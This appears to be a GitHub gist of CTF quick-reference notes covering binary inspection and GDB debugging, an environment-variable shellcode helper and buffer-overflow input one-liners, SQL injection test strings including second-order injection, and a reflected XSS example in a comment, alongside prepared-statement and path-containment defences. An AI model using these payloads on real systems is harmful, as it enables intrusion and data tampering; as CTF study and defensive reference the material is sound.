Last active May 20, 2022 11:51
Quick reference for CTF

Commands for exploiting software vulnerabilities

Dot-dot and directory traversal attacks

This is where noobs start. If you are not sure what this is, this guide might not make much sense to you.


ln -sf /tmp/target /tmp/link    # create (or replace) the symbolic link /tmp/link -> /tmp/target
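The defensive counterpart of the traversal tricks above, added here as an example that is not part of the original gist: resolve a user-supplied path under a base directory with realpath() so that both dot-dot segments and a planted symlink (like the one ln -sf creates) pointing outside the directory are rejected. The function and file names (resolve_under, demo, www/, outside.txt) and the sample tree are constructed for this example.

```python
import os
import tempfile

def resolve_under(base_dir, user_path):
    """Return the canonical path of user_path inside base_dir, or None if it escapes.

    realpath() resolves '..' segments and follows symlinks before the containment
    check, so dot-dot traversal and a symlink pointing outside base_dir are both
    rejected; a plain string-prefix check on the unresolved path would miss the
    symlink case.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath avoids the '/srv/www' vs '/srv/www2' bug of startswith()
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def demo():
    """Constructed sample tree: <tmp>/www/index.html, <tmp>/outside.txt and the
    symlink <tmp>/www/evil -> <tmp>/outside.txt (what ln -sf above would plant).
    Returns {requested path: True if it would be served, False if rejected}."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "www")
    os.mkdir(base)
    open(os.path.join(base, "index.html"), "w").close()
    open(os.path.join(root, "outside.txt"), "w").close()
    os.symlink(os.path.join(root, "outside.txt"), os.path.join(base, "evil"))
    requests = ["index.html", "sub/../index.html", "../outside.txt",
                "evil", "/etc/passwd", "sub/../../outside.txt"]
    return {p: resolve_under(base, p) is not None for p in requests}

if __name__ == "__main__":
    for path, served in demo().items():
        print(f"{'serve ' if served else 'reject'} {path}")
```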

Binary to ASM

Using objdump

objdump -d binary.out | less    # disassemble; use -S to interleave source when built with -g

[Image: ELF sections, slide by Adam Doupe]

View strings in binary

Using strings

strings binary.out
objdump -s binary.out | less

Checking system calls

See man ltrace and man strace.

ltrace -f binary.out    # trace library calls (-f follows forked children)
strace -f binary.out    # trace system calls (-f follows forked children)

Debugging with GDB


gdb binary.out
(gdb) r [args]                          # run the program, optionally with arguments
(gdb) b <function|file:line|*address>   # set a breakpoint
(gdb) c                                 # continue
(gdb) attach <pid>                      # attach to a running process
(gdb) set detach-on-fork off            # stay attached to forked children as well

Making sure that addresses are identical under the debugger and at run time is extremely important: GDB starts the program by its absolute path and adds variables such as LINES and COLUMNS to its environment, which shifts everything on the stack. Use this utility to keep the environment and argument stack the same in both modes.

  • Invocation (the utility below is saved here as r.sh; any name works):
$ ./r.sh binary.out         # just call the executable
$ ./r.sh -d binary.out      # run the executable in GDB
  • Utility (don't forget to chmod +x r.sh):

#!/bin/sh
# Runs prog directly or under GDB with the same minimal environment (env -),
# so that stack addresses agree between the two modes.
while getopts "dte:h?" opt ; do
  case "$opt" in
    d) gdb=1 ;;                   # run under gdb
    t) tty=1 ;;                   # give the program its own tty inside gdb
    e) env="$env $OPTARG" ;;      # extra KEY=VALUE pairs for the environment
    h|\?) printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
          exit 0 ;;
  esac
done
shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)            # absolute path, exactly as gdb would run it
shift
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
  else
    exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
  fi
else
  exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi

Ref - stackoverflow

Shell code for /bin/sh from shell-storm


Buffer overflow

Create a helper program that places the shell code (here one that spawns /bin/sh) in a new environment variable and then starts a shell that inherits it. (tutorial)

/* eggcode.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90

char shellcode[] = "";   /* shellcode bytes omitted on this page; see the shell-storm link above */

int main(void)
{
  char shell[512];

  puts("Eggshell loaded into environment.\n");
  memset(shell, NOP, 512);     /* fill up the buffer with NOPs (the sled) */
  /* fill up the shellcode on the second half, up to the end of the buffer */
  memcpy(&shell[511 - strlen(shellcode)], shellcode, strlen(shellcode));
  shell[511] = '\0';           /* terminate so that setenv() sees a C string */
  /* set the environment variable EGG to the buffer, overwriting if needed */
  setenv("EGG", shell, 1);
  /* invoke bash, which inherits the modified environment */
  system("/bin/bash");
  return 0;
}

Get the address of EGG in the environment, i.e. the start of the NOP sled leading to the malicious code (run it from the shell that eggcode started):

/* findeggaddr.c */
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
  char *egg = getenv("EGG");   /* NULL unless started from the eggcode shell */
  printf("EGG address: %p\n", (void *)egg);
  return 0;
}

Exploit the overflow: compute the stack address and generate the input with a Python or Perl one-liner, e.g.

python -c "print 'A'*516 + '\x73\xf5\xff\xbf'"    # Python 2 syntax: 516 filler bytes, then the return address
perl -e 'print "A"x516 . "\x73\xf5\xff\xbf"'

Please keep in mind

  • Endianness: on little-endian x86 the address bytes are written in reverse order, as in the one-liners above
  • check the environment (env) after injecting the shell code
  • size of datatypes (char-1, int-4, float-8, double-16 etc.) when overflowing buffers
    Declaration   Allocation in memory
    first         lower memory address
    last          higher memory address

[Image: process structure, slide by Adam Doupe]

SQL Injection cheat sheet

Checking for SQL injection:

  • Normal
    ' or 1=1 --
  • Blind: the response for the query below is the same as for a plain id=5 only if a user named h4x0r exists
    pressRelease.jsp?id=5 AND user_name()='h4x0r'
  • Second-order injection: register the user name john'-- ; when that account later changes its password, the application's query becomes
    update users set password='<new_password>' where username='john'--'
    and the real john's password is changed instead.

Please ensure you see the cheat sheet for the correct technology. Here is the one for MySQL.

Making client side requests

curl -H 'Header-Name: value' <ip/hostname>:<port>      # send a custom request header
curl -b PHPSESSID=n7591kbbse8rug4dfn019skv05 -F oid=5929 -F price=2500 -F cur=usd <url>    # send a cookie and a multipart form POST
nc <destination> <port> < input.txt    # send the file's contents to the service's stdin


  • Create a service definition in /etc/xinetd.d/<service_name> that runs the executable
service <service_name>
{
        socket_type     = stream
        protocol        = tcp
        user            = <user_executing_this>
        wait            = no
        server          = /<path_to_binary>/<binary_with_x_permissions>
        log_type        = SYSLOG daemon debug
}
  • Add the service name and port to /etc/services
<service_name>       11000/tcp
  • Restart xinetd (only needed if the executable's name changes after a patch; with wait = no a fresh server process is started for every connection, so a replaced binary is picked up automatically)
sudo /etc/init.d/xinetd restart

Preventing vulnerabilities

Specify the query structure first, then supply the values as bound parameters (prepared statement), so that user input can never change the structure:

$stmt = $db->prepare("select * from `users` where `username` = :name and `password` = SHA1( CONCAT(:pass, `salt`)) limit 1;");
$stmt->bindParam(':name', $name);
$stmt->bindParam(':pass', $pass);
$stmt->execute();
  • Remote OS command execution - escapeshellcmd($str) escapes a whole command line; it does not stop extra arguments being smuggled in, so escape each individual argument with escapeshellarg() as well
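Both checks from the SQL injection cheat sheet above (the ' or 1=1 -- login and the second-order john'-- password change) run against a concatenating query and against the bound-parameter form recommended in this section, as an added example that is not part of the original gist. It uses an in-memory SQLite table constructed for the example; SQLite has no SHA1() or CONCAT(), so a Python SHA1 function is registered and || stands in for CONCAT.

```python
import hashlib
import sqlite3

def sha1(s):
    return hashlib.sha1(s.encode()).hexdigest()

def setup_db():
    """Constructed sample table; passwords stored as SHA1(password + salt) like the PHP query."""
    db = sqlite3.connect(":memory:")
    db.create_function("SHA1", 1, sha1)   # SQLite has no SHA1(); '||' stands in for CONCAT()
    db.execute("create table users (username text, password text, salt text)")
    for user, pw in (("alice", "wonderland"), ("john", "s3cret")):
        db.execute("insert into users values (?, ?, ?)", (user, sha1(pw + "salt_" + user), "salt_" + user))
    return db

def login(db, name, pw, safe):
    """Return the matched username or None; safe=False pastes the input into the SQL text."""
    if safe:   # query structure is fixed first, the values are bound afterwards
        sql, args = ("select username from users where username = ? "
                     "and password = SHA1(? || salt) limit 1"), (name, pw)
    else:
        sql, args = ("select username from users where username = '%s' "
                     "and password = SHA1('%s' || salt) limit 1" % (name, pw)), ()
    row = db.execute(sql, args).fetchone()
    return row[0] if row else None

def change_password(db, name, new_pw, safe):
    if safe:
        db.execute("update users set password = SHA1(? || salt) where username = ?", (new_pw, name))
    else:   # with name "john'--" this becomes ... where username = 'john'--'  (the rest is a comment)
        db.execute("update users set password = SHA1('%s' || salt) where username = '%s'" % (new_pw, name))

def demo():
    """Run both cheat-sheet checks against the concatenating (safe=False) and bound (safe=True) variant."""
    out = {}
    for safe in (False, True):
        db = setup_db()
        # 'Normal' check: the classic ' or 1=1 -- as the user name
        out["login_bypass", safe] = login(db, "' or 1=1 --", "anything", safe)
        # Second-order: "john'--" is stored safely (bound); the damage happens when it is reused
        db.execute("insert into users values (?, ?, ?)", ("john'--", sha1("pw"), ""))
        change_password(db, "john'--", "owned", safe)
        out["john_now_owned", safe] = login(db, "john", "owned", True)
    return out

if __name__ == "__main__":
    for (check, safe), result in demo().items():
        print(f"{check:16} bound={safe!s:5} -> {result}")
```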

sailik1991 commented May 2, 2016

At present add your updates to the comment section.

Please use markdown syntax
Use one comment per person. This will help us to give vulnerabilities depending on your speciality! :)


ashuaeron commented May 2, 2016

XSS Attacks:

  • Reflected XSS attack


<?php $name = $_GET['name']; ?>
<p> Hello <?= $name ?></p>

An attack can take place by requesting untrusted data, like <script>alert('attack')</script>

sailik1991 - There are a thousand ways to evade checks and execute XSS.
Here is a list of all Filter Evasion techniques


yugarsi commented May 2, 2016

this is useful
